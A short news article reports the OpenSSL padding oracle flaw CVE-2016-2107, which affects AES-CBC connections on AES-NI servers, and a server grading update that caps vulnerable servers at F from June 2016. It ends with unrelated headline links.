Critical OpenSSL Vulnerability Exposes Servers to MITM Attacks
A critical vulnerability in OpenSSL, announced on 3rd May 2016, has left servers exposed to Man-in-the-Middle (MITM) attacks using a padding Oracle attack. This issue, identified as CVE-2016-2107, affects connections using AES CBC cipher and servers supporting AES-NI. To combat this, the grading criteria are being updated to version 2009m, with stricter penalties for vulnerable servers.
Previously, servers vulnerable to this attack were capped at a grade of C. However, from June 6, 2016, grades will be severely impacted, with a maximum cap of F for any server found to be at risk. This change aims to encourage swift action from system administrators to patch the vulnerability and ensure the security of their servers. The OpenSSL Security Advisory for CVE-2016-2107 did not explicitly state the release date, but it can be inferred from external sources that it was disclosed in May 2016.
The OpenSSL vulnerability CVE-2016-2107 poses a significant threat to servers using AES CBC cipher and AES-NI support. With the grading criteria update to version 2009m, servers must address this issue promptly to avoid severe grading penalties. System administrators are urged to apply the necessary patches and ensure their servers are secure.
Read also:
- Web3 social arcade extends Pixelverse's tap-to-earn feature beyond Telegram to Base and Farcaster platforms.
- FKS Inspections Uncover Wage, Security, and Employment Violations in Hotel and Catering Industry
- Specialist Banks Top AUTOHAUS Bankenmonitor 2025 in Customer Satisfaction
- Over 5,600 Road Safety Violations Caught in Manchester Trial
